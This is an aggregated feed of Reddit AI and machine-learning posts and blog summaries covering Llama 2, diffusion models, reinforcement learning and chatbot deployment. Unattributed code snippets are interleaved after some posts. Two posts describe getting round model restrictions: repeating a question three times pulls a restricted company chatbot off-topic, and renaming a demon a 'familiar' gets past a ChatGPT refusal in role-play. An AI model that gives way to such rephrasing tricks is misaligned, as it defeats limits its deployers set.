    I have not seen this BBC News video covered on this subreddit, but it piqued my curiosity, so I wanted to share. I have known about projects attempting to decode animal communication, such as Project CETI, which focuses on applying advanced machine learning to listen to and translate the communication of sperm whales. But the translator shown in the video blew my mind: it is already able to grasp the topics bats communicate about, such as food, distinguishing between genders and, surprisingly, unique "signature calls", or names, that the bats have. The study in question, led by Yossi Yovel of Tel Aviv University, monitored nearly two dozen Egyptian fruit bats for two and a half months and recorded their vocalisations. They then adapted a voice-recognition program to analyse 15,000 samples of …  ( 9 min )
    Which are the best alternatives to ChatGPT for browsing the web (it's currently deactivated for me)?
    I'm especially curious about services that use agents and the like to browse the web. I've lately been thinking that it should be possible to search much more intensively and automatically for information I don't need urgently. For example, why can't I have some AI agents look at thousands of pages that compare the different MacBook models to tell me which has the best price/performance ratio? Or find me all webshops that sell t-shirts in an extremely specific size (say, 80-83 cm long) and ship to my country. It would be so nice if it could do these searches for me in an elaborate way. submitted by /u/VLADIMIROVIC_L [link] [comments]  ( 9 min )
    LangSmith by LangChain team
    New product by the LangChain team https://www.langchain.com/langsmith. Any thoughts? submitted by /u/yangshunz [link] [comments]  ( 8 min )
    Controlling Content Moderation in Generative AI: Ensuring Safe and Accurate Responses for Company Data
    I'm supposed to analyse and implement an Azure OpenAI solution to use as a chatbot answering customer questions in our company, using our own data like product manuals and repair manuals for training. However, I'm concerned about content moderation and the potential risks associated with generative AI. How can we ensure that the AI remains within the boundaries of our intended use case and doesn't answer political or general questions? Additionally, how can we prevent the AI from guessing when it lacks the necessary knowledge, especially when handling questions related to potentially dangerous topics, such as sharp tools? Our colleagues from the USA have implemented a GPT-3.5 solution and wrote in the prompt that it should only answer questions about our company. This works, but if you repeat the same question three times ("Who is competitor XYZ?") it starts generating answers about how the competitor is known for its good products and quality. Is Azure OpenAI currently able to serve as a reliable chatbot answering customer service questions, or is it the wrong solution for this? (I am based in the EU, so an incorrect answer about how to repair a powerful drill could lead to serious liability issues if it doesn't cite exactly from the source, like a repair manual.) I am afraid that generative AI will paraphrase the source and generate incorrect instructions because it is not specific enough. submitted by /u/Other-Name5179 [link] [comments]  ( 9 min )
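    One cheap guard against paraphrased repair instructions, independent of the model provider, is a grounding check: only surface an answer whose sentences overlap heavily with the retrieved manual text, and fall back to quoting the source verbatim otherwise. A minimal sketch (the overlap threshold, the sentence-splitting rule, and the example texts are assumptions):

```python
def grounded_fraction(answer, source, min_overlap=0.7):
    """Fraction of answer sentences whose words mostly appear in the source.

    A crude grounding check: a low score suggests the answer paraphrases
    or invents content not present in the manual.
    """
    src_words = set(source.lower().split())
    sentences = [s.strip() for s in answer.split(".") if s.strip()]
    if not sentences:
        return 0.0
    grounded = 0
    for sentence in sentences:
        words = sentence.lower().split()
        overlap = sum(w in src_words for w in words) / len(words)
        if overlap >= min_overlap:
            grounded += 1
    return grounded / len(sentences)

manual = "Unplug the drill before replacing the chuck. Turn the chuck counterclockwise."
good = "Unplug the drill before replacing the chuck."
bad = "Oil the motor weekly and run it at full power."
```

    Platform content filters address safety categories (hate, violence, self-harm), not factual grounding against your own manuals, so a check like this has to live in your application layer.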
    Best AI Image Generator for Realistic-Looking Photoshoots?
    I'm new here, so sorry if this has been asked before. I'm looking to generate images that resemble realistic photoshoots of myself with AI. Which text-based AI is best? I've been using Midjourney, but it seems that Midjourney will no longer create images that strongly resemble the likeness of specific people that you feed it images of. Where have you guys had the most success with projects like this? submitted by /u/stebbi01 [link] [comments]  ( 8 min )
    Is there any good rpg AI?
    So today I got bored and had ChatGPT do a role play with me, as if I went to another world, and I told it what I would say or do. In sections of it, the stupid censor caused problems. Like, I tried to summon a demon, and it said it can't do that as it goes against the rules; I had to call it a familiar to summon it. I had my guy seal up a bandit cave to keep them from leaving, and use smoke from a fire to gas the cave to kill all of them. Again, that's against the rules of the censor crap. And then when we got into other things, like throwing a kinetic bomb in the middle of a city, it really didn't like that, even after explaining I'm not playing as a moral or ethical person. It wants to shove its values down my throat. I tried with Bard but it's too stupid: it wants to write a story and tell me what I did, and only every 10 steps will it allow me to say anything. Plus it has a censor. Idk what else I could use. Does anyone know of a good AI? Even better, one with a really good memory. submitted by /u/crua9 [link] [comments]  ( 9 min )
    Wikipedia’s Moment of Truth. Can the online encyclopedia help teach A.I. chatbots to get their facts right — without destroying itself in the process?
    submitted by /u/coolbern [link] [comments]  ( 8 min )
    [D] BMVC reviews experience
    I got 4 reviewers on my paper submitted to BMVC with ratings of BA (borderline accept), BA, BA, and A. What are our chances? I finished preparing the rebuttal but I can’t stop thinking about the outcome. Please let me know if you have any experience or insights. Thanks submitted by /u/Admirable_Cell_5256 [link] [comments]  ( 8 min )
    [D] Embedding human preferences in LLMs (beyond/besides RLHF)
    Hi everyone, can someone point to a comprehensive but accessible resource on the approaches to "embed" human preferences in LLMs? I saw Chip Huyen's post and it is super cool, but I wonder if (and why) the designers of such systems tend not to add text properties/contexts as an "input feature". For instance, a numerical feature representing the year the text was produced, or a flag telling whether the text is from a book, seems a straightforward way to control/condition the generation. Still, I'm missing some concepts here. submitted by /u/BenXavier [link] [comments]  ( 9 min )
    [D] Perspectives on diffusion
    Hi /r/ML, I wrote a blog post about a bunch of different perspectives on diffusion models. It's basically an extended sequel to another blog post I wrote last year, where I explored the connection between diffusion models and denoising autoencoders. There are many more of these connections, but unfortunately I don't have time to write separate blog posts about each of them, so I put them all together. Keen to hear what you think! https://sander.ai/2023/07/20/perspectives.html submitted by /u/benanne [link] [comments]  ( 9 min )
    [D] How the heck do I benchmark AIs and GPUs?
    I'm trying to get some real-world benchmarks for both NVIDIA and AMD. So far it's been a nightmare! Stable Diffusion stopped working on my PC, conversational model testing with a stopwatch was too fast to track, and I can't think of any other way to test these GPUs. Hard numbers. That's what I want. I can benchmark Cyberpunk, but AI is a complete mystery. How do I recommend somebody a GPU if I can't compare results? Is there a point in upgrading from a 3090 to a 4090? Some subreddits say no, others yes. I need some tests and I need em bad. submitted by /u/SociallyApparent [link] [comments]  ( 9 min )
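    For hard numbers, the usual approach is to time a fixed workload yourself: discard a few warmup iterations, then report mean latency and throughput. A minimal harness sketch (the placeholder workload is CPU-only and purely illustrative; swap in one Stable Diffusion denoising step or a fixed-length text generation for a real GPU comparison):

```python
import time

def benchmark(workload, warmup=2, iters=10):
    """Time a callable and report mean latency and throughput.

    Warmup iterations are discarded so one-time setup costs
    (kernel compilation, cache warming) don't skew the numbers.
    """
    for _ in range(warmup):
        workload()
    start = time.perf_counter()
    for _ in range(iters):
        workload()
    elapsed = time.perf_counter() - start
    return {"mean_ms": 1000 * elapsed / iters,
            "iters_per_sec": iters / elapsed}

# Placeholder workload; replace with a fixed model inference call.
result = benchmark(lambda: sum(i * i for i in range(100_000)))
```

    One GPU-specific caveat: CUDA calls are asynchronous, so when timing GPU frameworks you must synchronize the device before reading the clock, or the numbers measure kernel launch time rather than execution time.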
    [P] What would be a good model/pipeline for simple intent recognition that has multi-lingual support and is easy to set up?
    So I have been exploring the potential of simple intent identifiers for a task recently. I have explored Rasa, but the fact that it doesn't work with Python 3.10/3.11 is a major pain and throws a wrench in my plans for large-scale integration into other projects. I am looking for either a pipeline/framework (could be something like Rasa, or a standalone model) that has intent recognition capabilities, with multilingual support (Portuguese), and can run on newer Python versions (i.e., doesn't give me compatibility headaches). I also want a relatively lightweight model, considering my simple task. Could you guys recommend something like that for me? submitted by /u/SnooPineapples7791 [link] [comments]  ( 9 min )
    [P] Run Llama 2 Locally in 7 Lines! (Apple Silicon Mac)
    Want to start playing with Meta’s Llama 2? It takes just 7 lines of shell script using llama.cpp to get you started! https://preview.redd.it/vhuzhrj4h6db1.png?width=2030&format=png&auto=webp&s=d349dd796039f3af7e117423c4abdae7efde2fae Copy Code Snippet: https://lastmileai.dev/workbooks/clkbifegg001jpheon6d2s4m8 submitted by /u/InevitableSky2801 [link] [comments]  ( 8 min )
    [P] How to fine tune 8k context length Llama 13B on minimal number of gpus?
    I have a Llama 13B model I want to fine-tune. I am using QLoRA (brings it down to 7 GB of GPU memory) and using NTK scaling to bring the context length up to 8k (the dataset requires at least this much context length). But at 1024 context length, fine-tuning spikes to 42 GB of GPU VRAM used, so evidently it won't be feasible to use an 8k context length unless I use a ton of GPUs. Is there any way to lower memory so that one or two 3090s are enough for 8k context-length fine-tuning? submitted by /u/bahibo [link] [comments]  ( 9 min )
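    The spike is expected: per-layer activations grow linearly with context length, while naive attention score matrices grow quadratically. A back-of-envelope sketch (the layer/hidden/head counts loosely resemble a 13B config, but every constant here is an illustrative assumption, not a measured figure):

```python
def activation_memory_gb(seq_len, layers=40, hidden=5120, heads=40,
                         batch=1, bytes_per=2):
    """Very rough transformer activation memory for one training step.

    Linear term: a handful of hidden-sized activations per layer.
    Quadratic term: the (heads x seq x seq) attention score matrices.
    All constants are illustrative, not measured.
    """
    linear = layers * batch * seq_len * hidden * 8 * bytes_per
    quadratic = layers * batch * heads * seq_len * seq_len * bytes_per
    return (linear + quadratic) / 1024**3

m1k = activation_memory_gb(1024)
m8k = activation_memory_gb(8192)
```

    The quadratic term is why gradient checkpointing (recompute activations in the backward pass) and memory-efficient attention implementations that avoid materializing the seq x seq scores help far more at 8k than at 1k.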
    [D] Need career advice on what I should do next in ML :(
    Hey everyone, hope you all are doing great. I just completed the Machine Learning Specialization on Coursera by Andrew Ng and was looking for some advice on what I should do next. Would love to hear input from you guys. I'm self-studying Machine Learning full-time, while I'm also getting a bachelor's degree in Computer Science from an online virtual university. It's been 3+ months since I stepped into Machine Learning, and so far I've been developing deep intuition and foundational concepts of Machine Learning. Since I'm really passionate about mathematics, I'm very much focused on understanding the mathematics behind everything. By completing this specialization I've developed good foundational concepts of the following: • Supervised Machine Learning • Linear regression • Logistic regr…  ( 10 min )
    [D] Has anything from the Agent57 paper been used in anything interesting lately?
    I read the blog post and paper for Agent57 and thought it was pretty interesting but haven't seen people talk about it much since then. Has it been used for anything? If not, why hasn't it been very influential? submitted by /u/sledpull [link] [comments]  ( 8 min )
    [D] Best free LLM for text classification
    Hey all, I want to retrieve all speeches from congressional records of the House of Representatives where the politician talks about the tax behavior of companies. I currently load the records into my script and divide them into individual speeches. Then I use keyword search to determine whether the politician talks about the tax behavior of companies. I want to replace this keyword search with an LLM which classifies the speeches. I will analyze > 50,000 speeches, so I don't want to use a costly model like GPT-4. Actually, I want to spend max 10€ in total. What LLMs, which I can access via an API, would you recommend for this task? Thanks in advance. submitted by /u/Silly_Pack9404 [link] [comments]  ( 9 min )
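    At this scale the budget math matters as much as the model choice: a yes/no prompt keeps output tokens near zero, so cost is dominated by input length. A sketch (the prompt template and the per-million-token price are assumptions; check your provider's actual rates):

```python
def classify_prompt(speech):
    """Build a yes/no classification prompt for an instruct model.

    The template wording is a hypothetical example, not a tested prompt.
    """
    return (
        "Does the following congressional speech discuss the tax "
        "behavior of companies? Answer only YES or NO.\n\n"
        f"Speech: {speech}"
    )

def cost_eur(n_speeches, avg_tokens, eur_per_mtok):
    """Total inference cost if every speech is sent once as input tokens."""
    return n_speeches * avg_tokens * eur_per_mtok / 1_000_000

# Illustrative price assumption of 0.20 EUR per million input tokens.
budget_ok = cost_eur(50_000, avg_tokens=800, eur_per_mtok=0.2) <= 10
```

    A hybrid also helps the budget: keep the cheap keyword search as a high-recall first pass and only send the matched speeches to the LLM for confirmation.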
    [D] Disappointing Llama 2 Coding Performance: Are others getting similar results? Are there any other open-source models that approach ChatGPT 3.5's performance?
    I've been excitedly reading the news and discussions about Llama 2 the past couple of days, and got a chance to try it this morning. I was underwhelmed by the coding performance (running the 70B model on https://llama2.ai/). It has consistently failed most of the very-easy prompts that I made up this morning. I checked each prompt with ChatGPT 3.5, and 3.5 got 100% (which means these prompts are quite easy). This result was surprising to me based on the discussion and articles I've read. However, digging into the paper (https://ai.meta.com/research/publications/llama-2-open-foundation-and-fine-tuned-chat-models/), the authors are transparent that the coding performance is lacking. Are my observations consistent with the results others are getting? I haven't had time to keep up with all the open-source LLMs being worked on by the community; are there any other models that approach even ChatGPT 3.5's coding performance? (Much less GPT 4's performance, which is the real goal.) submitted by /u/Egan_Fan [link] [comments]  ( 9 min )
    Simple text-generation evaluation/benchmark for Small Language Models [GitHub] [P]
    slmqa on GitHub I spent hours searching for a way to compare the quality of the text generation of instruct-tuned small language models. Failing to find an evaluation simple enough for a small model and easy to use, I found it easier to create one. I'm sharing it here in case anyone else finds it useful. slmqa is a simple question-answer evaluation benchmark for small language models. It includes a dataset of 909 general-knowledge question-answer pairs. The QA pairs were generated with gpt-3.5-turbo, stripped of duplicates and answers shorter than 5 characters, and cleaned by hand. The score is the percentage of correct answers. Sample JSON:
    { "question": "What is the name of the highest mountain in the world?", "answer": "everest" },
    { "question": "What is the name of the famous Austrian composer who wrote the Ninth Symphony?", "answer": "beethoven" },
    { "question": "Which country is the largest by area?", "answer": "russia" }
    submitted by /u/Pan000 [link] [comments]  ( 9 min )
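    One plausible reading of "percentage of correct answers" for lowercase single-word answers like these is a case-insensitive substring match against the model's reply; that scoring rule is an assumption, made explicit in the sketch below with a dummy stand-in for the model:

```python
import json

def score(qa_pairs, generate):
    """Percentage of questions whose expected answer appears
    (case-insensitively) in the model's generated reply."""
    correct = sum(
        pair["answer"].lower() in generate(pair["question"]).lower()
        for pair in qa_pairs
    )
    return 100.0 * correct / len(qa_pairs)

pairs = json.loads("""[
  {"question": "What is the name of the highest mountain in the world?",
   "answer": "everest"},
  {"question": "Which country is the largest by area?",
   "answer": "russia"}
]""")

# Dummy stand-in for a small model's generate() call.
dummy = lambda q: "Mount Everest." if "mountain" in q else "I am not sure."
acc = score(pairs, dummy)
```

    Substring matching is forgiving of verbose replies but can over-credit answers that merely mention the entity; exact-match and normalized-match scores are worth reporting side by side.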
    [D] Security and protection in ML deployments
    After researching quite heavily how to protect Python-based inference code and models when they are deployed on client infrastructure, I came across pyinstaller and pyoxidizer, but it looks like they do not work that well. So I concluded that the best way is to convert critical pipelines to C++. Is that correct? submitted by /u/Ok-Influence368 [link] [comments]  ( 8 min )
    [D] What LLMs do you use the most?
    With the emergence of new models gaining popularity, such as Claude 2 and Llama 2 (which has the potential for better fine-tuned models), the development of Bard, and the controversies surrounding ChatGPT performing worse, plus the already-existing content filters that limit models' capabilities (not just to align with moral standards and human values, but also in ways that may not fall under objective morality, or that are simply too sensitive), is there a certain model you think is currently the best overall, at least for now, other than GPT-4? I'm really curious what the community thinks, as I've searched a lot and found many clashing opinions about which models are superior, along with clickbait-ish titles calling model so-and-so "The ChatGPT Killer". With all this in consideration, what model(s) do you ACTUALLY use the most? I'd be grateful if you shared your thoughts, and thanks for your time. submitted by /u/Fantastic-Air8513 [link] [comments]  ( 9 min )
    [D] Any cool project ideas with this data?
    I've uploaded a reddit dataset that has multiple Reddit posts along with the most upvoted comment for each post. The dataset is collected from 9 subreddits. I'm looking for cool project ideas with this data. Let's discuss! https://www.reddit.com/r/datasets/comments/154pe3y/reddit_posts_dataset_with_the_top_comment/?utm_source=share&utm_medium=android_app&utm_name=androidcss&utm_term=1&utm_content=1 submitted by /u/04RR [link] [comments]  ( 8 min )
    [P] Interactive Exploration of Stable Diffusion Generated Images
    I just created a Hugging Face Space showcasing how to interactively explore the outputs of a Stable Diffusion model via CLIP embeddings: embedding-based image similarity plotted in 2D via dimensionality reduction. The visualization is done using the tool Spotlight. Also, I created a tutorial showcasing how to automatically select promising prompts and images from a large dataset. It is roughly based on the following approach:
    1. Calculate the CLIP score for all prompt-image pairs to measure generation quality.
    2. Generate CLIP embeddings to be able to calculate a similarity between images (or texts).
    3. Embedding-based identification of clusters that have an exceptionally high CLIP score.
    Have you ever explored any (automatic) evaluation strategies for image generation models? I would love to learn about some alternative approaches. submitted by /u/OkResearch6289 [link] [comments]  ( 9 min )
    [D] Handle dozen of thousands of classes
    Hello! I'm working on an NLP classification project with more or less 13k classes. The best model I've had so far is a fine-tuned LLM encoder. However, with the number of classes I have now, it is very slow. So I searched for ways to deal with that, and found two: Hierarchical Softmax and Negative Sampling. However, both seem to have been used almost only in the context of word2vec training, so I wonder if there is a reason why they would not work for a "classical" classification? (Or is my kind of problem just too rare?) Also, I found really few implementations of these in PyTorch, a fortiori with transformers... Is it because there is something better? If not, do you know of some recent implementations? Thank you in advance! submitted by /u/ez613 [link] [comments]  ( 9 min )
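    Nothing restricts negative sampling to word2vec: it applies to any softmax over a large label set; word2vec is simply where it became popular. A stdlib sketch of a sampled-softmax loss that scores the target plus k random negatives instead of all 13k classes (the uniform negative sampler and the toy scorer are the simplest illustrative choices, not necessarily the best):

```python
import math
import random

def sampled_softmax_loss(logit_fn, target, n_classes, k=50, rng=random):
    """Cross-entropy over the target class plus k sampled negatives.

    logit_fn(c) returns the model's score for class c; per example this
    evaluates 1 + k scores instead of all n_classes.
    """
    negatives = set()
    while len(negatives) < k:
        c = rng.randrange(n_classes)
        if c != target:
            negatives.add(c)
    scores = [logit_fn(target)] + [logit_fn(c) for c in sorted(negatives)]
    m = max(scores)  # subtract the max for numerical stability
    log_z = m + math.log(sum(math.exp(s - m) for s in scores))
    return log_z - scores[0]  # -log p(target | sampled subset)

# Toy scorer: the correct class gets logit 1.0, everything else 0.0.
loss = sampled_softmax_loss(lambda c: 1.0 if c == 3 else 0.0,
                            target=3, n_classes=13_000)
```

    With a transformer encoder the natural fit is to keep the 13k-way output layer as an embedding matrix and gather only the sampled rows each step, so training cost stops scaling with the full label count; inference still scores all classes once.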
    [D] Does anyone know what sorcery SAM's official web demo uses? I just cannot replicate the results locally.
    This is specifically in regards to automatic mask generation, where SAM samples a grid of points (32x32 grid by default) and creates a mask for each point prompt. Duplicates are then removed by NMS. Ideally this process shouldn't be able to auto-generate complex structures that require multiple positive/negative point prompts, and that is what I have observed when using the models locally. But, the "Everything" option in the web demo(https://segment-anything.com/demo) does insanely well. It can even segment occluded objects into a single disconnected mask. It is supposed to be running in the browser and is reasonably fast, so they can't be doing some super heavy pre/post-processing either. Anyone have an idea of what the "Everything" option in the web demo is doing? submitted by /u/Atom_101 [link] [comments]  ( 9 min )
    [P] MiniGPT4.cpp: (4bit/5bit/16float) MiniGPT4 inference on CPU
    https://github.com/Maknee/minigpt4.cpp submitted by /u/makneeee [link] [comments]  ( 8 min )
    Difference Between Modern and Traditional Data Quality – DQLabs
    Modern data quality practices make use of new technology, automation, and machine learning to handle a variety of data sources, ensure real-time processing, and stimulate stakeholder collaboration. Data governance, continuous monitoring, and proactive management are prioritized to ensure accurate, reliable, and fit-for-purpose data for informed decision-making and corporate success. Modern data quality practices differ from… Read More »Difference Between Modern and Traditional Data Quality – DQLabs The post Difference Between Modern and Traditional Data Quality – DQLabs appeared first on Data Science Central.  ( 19 min )
    How much coding is needed in a data science career?
    The most common question in the minds of people who are not from a technical background is how much coding is required to succeed on a data science career path. If you also have the same question, you are not alone. But the surprising answer is: "it depends". Unarguably, coding is a crucial aspect and vital tool for… Read More »How much coding is needed in a data science career? The post How much coding is needed in a data science career? appeared first on Data Science Central.  ( 21 min )
    Enel automates large-scale power grid asset management and anomaly detection using Amazon SageMaker
    This is a guest post by Mario Namtao Shianti Larcher, Head of Computer Vision at Enel. Enel, which started as Italy’s national entity for electricity, is today a multinational company present in 32 countries and the first private network operator in the world with 74 million users. It is also recognized as the first renewables […]  ( 8 min )
    Efficiently train, tune, and deploy custom ensembles using Amazon SageMaker
    Artificial intelligence (AI) has become an important and popular topic in the technology community. As AI has evolved, we have seen different types of machine learning (ML) models emerge. One approach, known as ensemble modeling, has been rapidly gaining traction among data scientists and practitioners. In this post, we discuss what ensemble models are and […]  ( 12 min )
    Proper Robustness Evaluation of Confidence-Calibrated Adversarial Training in PyTorch
    Properly evaluating defenses against adversarial examples has been difficult as adversarial attacks need to be adapted to each individual defense. This also holds for confidence-calibrated adversarial training, where robustness is obtained by rejecting adversarial examples based on their confidence. Thus, regular robustness metrics and attacks are not easily applicable. In this article, I want to discuss how to evaluate confidence-calibrated adversarial training in terms of metrics and attacks. The post Proper Robustness Evaluation of Confidence-Calibrated Adversarial Training in PyTorch appeared first on David Stutz.  ( 9 min )
    Using societal context knowledge to foster the responsible application of AI
    Posted by Donald Martin, Jr., Technical Program Manager, Head of Societal Context Understanding Tools and Solutions (SCOUTS), Google Research AI-related products and technologies are constructed and deployed in a societal context: that is, a dynamic and complex collection of social, cultural, historical, political and economic circumstances. Because societal contexts by nature are dynamic, complex, non-linear, contested, subjective, and highly qualitative, they are challenging to translate into the quantitative representations, methods, and practices that dominate standard machine learning (ML) approaches and responsible AI product development practices. The first phase of AI product development is problem understanding, and this phase has tremendous influence over how problems (…  ( 93 min )
    So, So Fresh: Play the Newest Games in the Cloud on Day One
    It’s a party this GFN Thursday with several newly launched titles streaming on GeForce NOW. Revel in gaming goodness with Xenonauts 2, Viewfinder and Techtonica, among the four new games joining the cloud this week. Portal fans, stay tuned — the Portal: Prelude RTX mod will be streaming on GeForce NOW to members soon. Plus, Read article >  ( 5 min )
    Collaborators: Gaming AI with Haiyan Zhang
    For over a decade, Xbox has been leveraging AI to elevate gaming. Haiyan Zhang, GM of Gaming AI, explores the collaborations behind the work and the potential for generative AI to support better experiences for both players and game creators. The post Collaborators: Gaming AI with Haiyan Zhang appeared first on Microsoft Research.  ( 29 min )
    The Complete Python Mega Bundle features Neural Network, Machine Learning & AI
    submitted by /u/brand_momentum [link] [comments]  ( 8 min )
    Custom instructions for ChatGPT
    We’re rolling out custom instructions to give you more control over how ChatGPT responds. Set your preferences, and ChatGPT will keep them in mind for all future conversations.  ( 6 min )

    Best way to approach creating 2048 bot
    Hi guys, I'm just starting to learn about neural networks. I started with the NEAT algorithm, as there is a nice library for Python. I wanted to try to create a neural network that plays 2048 with NEAT, but from what I read online, it isn't really feasible and doesn't result in good playing performance and high scores. I now have a few questions; keep in mind that I'm a beginner in this field. Why doesn't NEAT work well with 2048? What would be the best way to approach this problem? Are there any resources where I can learn more about this stuff? Am I right in thinking that it must be possible to create a NN that plays 2048 well, as the basic strategy I use when playing is fairly simple (keep everything on one side, toward the corner)? Thanks in advance. submitted by /u/DarkLord76865 [link] [comments]  ( 9 min )
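    Whichever algorithm ends up working, the input representation matters a lot for 2048: raw tile values span several orders of magnitude, so a common choice is to one-hot encode each cell's log2 exponent instead. A sketch (the 16-exponent cap is an assumption):

```python
import math

def encode_board(board, max_exp=16):
    """Flatten a 4x4 board into per-cell one-hot tile exponents.

    Tile 2 -> exponent 1, tile 2048 -> exponent 11; empty cells use
    slot 0. This gives the network a 4*4*max_exp binary input instead
    of raw tile values spanning several orders of magnitude.
    """
    features = []
    for row in board:
        for tile in row:
            exp = int(math.log2(tile)) if tile else 0
            one_hot = [0] * max_exp
            one_hot[exp] = 1
            features.extend(one_hot)
    return features

board = [[2, 0, 0, 4],
         [0, 0, 0, 0],
         [0, 0, 0, 0],
         [0, 0, 0, 2048]]
x = encode_board(board)
```

    NEAT tends to struggle here partly because evolving both topology and weights scales poorly to inputs of this size; expectimax search with a learned or handcrafted evaluation function is the approach most strong published 2048 agents use.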
    Neural Networks from Scratch in Python
    submitted by /u/keghn [link] [comments]  ( 8 min )
    Convolutions in image processing
    submitted by /u/keghn [link] [comments]  ( 8 min )
    Beginner RL Project Advice
    Hi, I'm somewhat new to reinforcement learning and have been trying to acquaint myself using gymnasium/stable baselines. I currently have a custom environment and I'm using PPO on it, but I don't actually know how to assess what the best algorithm would be for the problem, nor can I tell if training is really doing exactly what I want to. I'm going to include the link to the repo and if anybody has any advice I'd love it. I may be doing things that are very obviously silly that I'm just unaware of, so any advice would be great. Throwaway bc I use my real name on github lmao https://github.com/MarcusWheeler/dcss_inventory submitted by /u/Charming-Art-732 [link] [comments]  ( 9 min )
    Minari 0.4.0 is live! (Gym for offline RL, by the Farama Foundation)
    Minari now has full support for Dict, Tuple, Discrete, Box, and Text spaces without flattening, explicit dataset versioning, plus subsets of action/obs spaces in datasets. Additionally, new v1 versions of each dataset were released to comply with the new dataset format. The new datasets do not have observation and action flattening (relevant for pointmaze datasets), introduce serialized representations of action and observation spaces in the observation_space and action_space fields, and specify minari version compatibility with the minari_version field. Python 3.11 compatibility was added, with removal of 3.7 support as it has reached end-of-life. We also include two new tutorials: observation space subsetting, and behavior cloning with rl_zoo3 and pytorch DataLoader. Announcement Tweet: https://twitter.com/FaramaFound/status/1681730025513467931 Release Notes: https://github.com/Farama-Foundation/Minari/releases/tag/v0.4.0 submitted by /u/elliottower [link] [comments]  ( 9 min )
    Struggling with value function approximation
    Hi everyone. I've been studying RL for a few months now and am trying to implement it in a school project. My project is similar to the mountain-car (car in a valley) problem, where an agent needs to reach some point, except the point is moving and in 3D. As such, the state space is continuous, but I've defined my action space to be 6 discrete actions. I've done table-lookup Q-learning in the past, but not continuous value function approximation. My method is as follows:
    1. At the start of the episode, initialize the weights randomly and calculate the action value for each of the 6 actions. Choose an action using an epsilon-greedy policy.
    2. For each time step, execute the chosen action and observe the new state and reward (my reward being distance from the goal). Store the 6 features of the initial state.
    3. Calculate the new Q values based on the new state and the weights w.
    4. Choose a new action based on these Q values and the epsilon-greedy policy.
    5. Using the new action, update the weights w using the Q value at the new action minus the Q value at the old action, times the features.
    6. Set the old state and action to the new state and action, and repeat until terminal.
    My problem is that the weights w blow up to inf very, very quickly, within 10 time steps. Does anyone have any advice, such as resources with pseudocode to look at, or notice any problems in my method? I think my problem is coming from evaluating Q for the old and new states, but I'm not sure. Thank you. submitted by /u/LevisLover [link] [comments]  ( 9 min )
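    Exploding weights with linear function approximation usually come from a too-large step size, unnormalized features (raw distances!), or a malformed TD target: note that step 5 as described omits the reward and the discount factor from the target. For reference, a sketch of the standard semi-gradient SARSA update (the feature values and step size here are made up; the key points are the small alpha, bounded features, and dropping the bootstrap term on terminal steps):

```python
def q_value(w, features):
    return sum(wi * fi for wi, fi in zip(w, features))

def sarsa_update(w, feats, reward, next_feats, alpha=0.01, gamma=0.99,
                 done=False):
    """One semi-gradient SARSA step for linear Q(s, a) = w . phi(s, a).

    Divergence checklist: keep features in a bounded range (normalize
    distances), keep alpha small, and use the reward alone as the
    target on terminal transitions.
    """
    target = reward if done else reward + gamma * q_value(w, next_feats)
    td_error = target - q_value(w, feats)
    return [wi + alpha * td_error * fi for wi, fi in zip(w, feats)]

w = [0.0] * 6
feats = [0.5, -0.2, 0.1, 0.0, 0.3, 1.0]  # made-up normalized features
for _ in range(1000):
    w = sarsa_update(w, feats, reward=-1.0, next_feats=feats)
```

    If raw distances in metres feed directly into phi, the TD error and the features multiply into huge weight steps; dividing each feature by its maximum range is often enough to stop the blow-up.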
    What do finite and infinite horizon mean in reinforcement learning terms? And what does a finite-horizon undiscounted return mean?
    submitted by /u/aabra__ka__daabra [link] [comments]  ( 8 min )
    Help in PPO implementation
    In the blog post: https://iclr-blog-track.github.io/2022/03/25/ppo-implementation-details/ and the related implementation: https://github.com/vwxyzjn/ppo-implementation-details/blob/main/ppo.py, why aren't we ending the rollout collection when the episode has terminated, instead of only when num_steps is reached? What if the episode terminates before reaching num_steps? Won't the training part give an error? submitted by /u/Interesting-Weeb-699 [link] [comments]  ( 8 min )
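    For context, implementations like the one linked collect fixed-length rollouts that can span episode boundaries: the vectorized env auto-resets, and the stored done flags stop value bootstrapping from leaking across a reset, so no error occurs. A simplified GAE computation illustrating that masking (a sketch, under the convention that dones[t] == 1 means s_{t+1} is a reset state) might look like:

```python
import numpy as np

def gae(rewards, values, dones, next_value, gamma=0.99, lam=0.95):
    """Generalized advantage estimation over a fixed-length rollout.

    dones[t] == 1 means the episode ended at step t (s_{t+1} is a reset),
    which cuts both bootstrapping and the advantage recursion at that step.
    """
    T = len(rewards)
    adv = np.zeros(T)
    lastgaelam = 0.0
    for t in reversed(range(T)):
        nonterminal = 1.0 - dones[t]                  # zero out across resets
        nv = next_value if t == T - 1 else values[t + 1]
        delta = rewards[t] + gamma * nv * nonterminal - values[t]
        adv[t] = lastgaelam = delta + gamma * lam * nonterminal * lastgaelam
    return adv
```

    With this masking, a rollout containing several partial episodes trains correctly; each episode's advantages are computed independently.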
    How do I find papers related to a specific application of RL?
    My cousin and I are starting to work on a project he can do in high school and while doing preliminary research on a related application, I was unable to find anything about this related application. I was thinking we might be able to publish a paper if the application has not already been done. submitted by /u/newjeison [link] [comments]  ( 8 min )
    Gymnasium v0.29.0 has been released!
    Gymnasium v0.29.0 is out! This release includes 6 months' worth of bug fixes and new features. In particular, it deprecates several features: Wrapper.__get_attr__, gymnasium.make(..., autoreset=True), gymnasium.make(..., apply_api_compatibility=True), Env.reward_range and gymnasium.vector.make that will be removed in v1.0. Additionally, as python 3.7 has reached its end of life support, we have dropped support for it and updated MuJoCo Hopper & Walker2D models to work with MuJoCo >= 2.3.3. This release also includes an official way to cite Gymnasium. While a full paper is still some time away, you can now use the DOI 10.5281/zenodo.8127025 for citations: https://zenodo.org/record/8127025 Announcement Tweet: https://twitter.com/FaramaFound/status/1681479718774743040 Release Notes: https://github.com/Farama-Foundation/Gymnasium/releases/tag/v0.29.0 submitted by /u/elliottower [link] [comments]  ( 8 min )
  • Open

    [P] Running Llama 2 locally in <10 min
    I wanted to play with Llama 2 right after its release yesterday, but it took me ~4 hours to download all 331GB of the 6 models. If you don’t have 4 hours or 331GB to spare, I brought all the models into XetHub, where it’s now available for you to use: https://xethub.com/XetHub/Llama2. I used xet mount to get started in seconds, and within a few minutes, I had the model generating text without needing to download everything or make an inference API call.

    # From a g4dn.8xlarge instance in us-west-2:
    Mount complete in 8.629213s
    # install model requirements, and then ...
    (venv-test) ubuntu@ip-10-0-30-1:~/Llama2/code$ torchrun --nproc_per_node 1 example_chat_completion.py \
        --ckpt_dir ../models/llama-2-7b-chat/ \
        --tokenizer_path ../models/tokenizer.model \
        --max_seq_len 512 --max_batch_size 4
    > initializing model parallel with size 1
    > initializing ddp with size 1
    > initializing pipeline with size 1
